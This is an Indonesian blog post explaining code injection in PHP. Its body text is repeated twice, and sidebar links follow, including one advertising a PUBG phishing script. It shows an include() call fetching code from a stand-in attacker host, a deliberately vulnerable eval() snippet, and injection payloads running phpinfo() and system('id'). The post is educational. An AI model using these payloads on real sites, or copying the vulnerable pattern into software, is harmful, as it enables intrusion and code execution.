Exploit Code Injection ( Software Attack )

Halo semua, kali saya akan membahas apa itu Exploit Code Injection ( Xcode Magazine ). Silahkan simak dengan baik yaaaa

Keterangan :

Dilansir wikipedia, Exploit code injection adalah eksploitasi bug komputer yang disebabkan oleh pemrosesan data yang tidak valid. Injeksi digunakan oleh penyerang untuk memasukkan kode ke dalam program komputer yang rentan dan mengubah jalannya eksekusi. Wikipedia

Jenis serangan ini biasanya dimungkinkan karena kurangnya validasi data input/output yang tepat, misalnya :

- karakter yang diizinkan (kelas ekspresi reguler standar atau kustom)

- format data

- jumlah data yang diharapkan

Resiko Jika Terkena :

- Jenis kerentanan ini dapat berkisar dari sangat sulit ditemukan, hingga mudah ditemukan

- Jika ditemukan, biasanya cukup sulit untuk dieksploitasi, tergantung skenario

- Jika berhasil dieksploitasi, dampaknya dapat mencakup hilangnya kerahasiaan, hilangnya integritas, hilangnya ketersediaan, dan/atau hilangnya akuntabilitas

Contoh :

#1. Jika aplikasi melewati parameter yang dikirim melalui permintaan GET ke include()fungsi PHP tanpa validasi input, penyerang dapat mencoba mengeksekusi kode selain yang ada dalam pikiran pengembang.

URL di bawah ini meneruskan nama halaman ke include()fungsi. http://testsite.com/index.php?page=contact.php

File "evilcode.php" mungkin berisi, misalnya, fungsi phpinfo() yang berguna untuk mendapatkan informasi tentang konfigurasi lingkungan di mana layanan web berjalan. Penyerang dapat meminta aplikasi untuk mengeksekusi kode PHP mereka menggunakan permintaan berikut: http://testsite.com/?page=http://evilsite.com/evilcode.php

#2. Ketika seorang pengembang menggunakan eval()fungsi PHP dan memberikannya data tidak tepercaya yang dapat dimodifikasi oleh penyerang, injeksi kode dapat dilakukan.

Contoh di bawah ini menunjukkan cara berbahaya untuk menggunakan eval()fungsi:

$myvar = "varname";

$x = $_GET['arg'];

eval("$myvar = $x;");

Karena tidak ada validasi input, kode di atas rentan terhadap serangan Code Injection.

Sebagai contoh :

/index.php?arg=1; phpinfo()

Saat mengeksploitasi bug seperti ini, penyerang mungkin ingin menjalankan perintah sistem. Dalam hal ini, bug injeksi kode juga dapat digunakan untuk injeksi perintah, misalnya :

/index.php?arg=1; system('id')

>_ Sekian, kalo ada salah mohon di koreksi

Halo semua, kali saya akan membahas apa itu Exploit Code Injection ( Xcode Magazine ). Silahkan simak dengan baik yaaaa

Keterangan :

Jenis serangan ini biasanya dimungkinkan karena kurangnya validasi data input/output yang tepat, misalnya :

- karakter yang diizinkan (kelas ekspresi reguler standar atau kustom)

- format data

- jumlah data yang diharapkan

Resiko Jika Terkena :

- Jenis kerentanan ini dapat berkisar dari sangat sulit ditemukan, hingga mudah ditemukan

- Jika ditemukan, biasanya cukup sulit untuk dieksploitasi, tergantung skenario

- Jika berhasil dieksploitasi, dampaknya dapat mencakup hilangnya kerahasiaan, hilangnya integritas, hilangnya ketersediaan, dan/atau hilangnya akuntabilitas

Contoh :

URL di bawah ini meneruskan nama halaman ke include()fungsi. http://testsite.com/index.php?page=contact.php

#2. Ketika seorang pengembang menggunakan eval()fungsi PHP dan memberikannya data tidak tepercaya yang dapat dimodifikasi oleh penyerang, injeksi kode dapat dilakukan.

Contoh di bawah ini menunjukkan cara berbahaya untuk menggunakan eval()fungsi:

$myvar = "varname";

$x = $_GET['arg'];

eval("$myvar = $x;");

Karena tidak ada validasi input, kode di atas rentan terhadap serangan Code Injection.

Sebagai contoh :

/index.php?arg=1; phpinfo()

Saat mengeksploitasi bug seperti ini, penyerang mungkin ingin menjalankan perintah sistem. Dalam hal ini, bug injeksi kode juga dapat digunakan untuk injeksi perintah, misalnya :

/index.php?arg=1; system('id')

>_ Sekian, kalo ada salah mohon di koreksi

Exploit Code Injection ( Software Attack )

Exploit Code Injection ( Software Attack )

30 Pesona Manis Nabilah Ratna Ayu Azalia

古代风格 Ancient Beauty Cute Girls

Script Phising PUBG Season 12

Formulir Kontak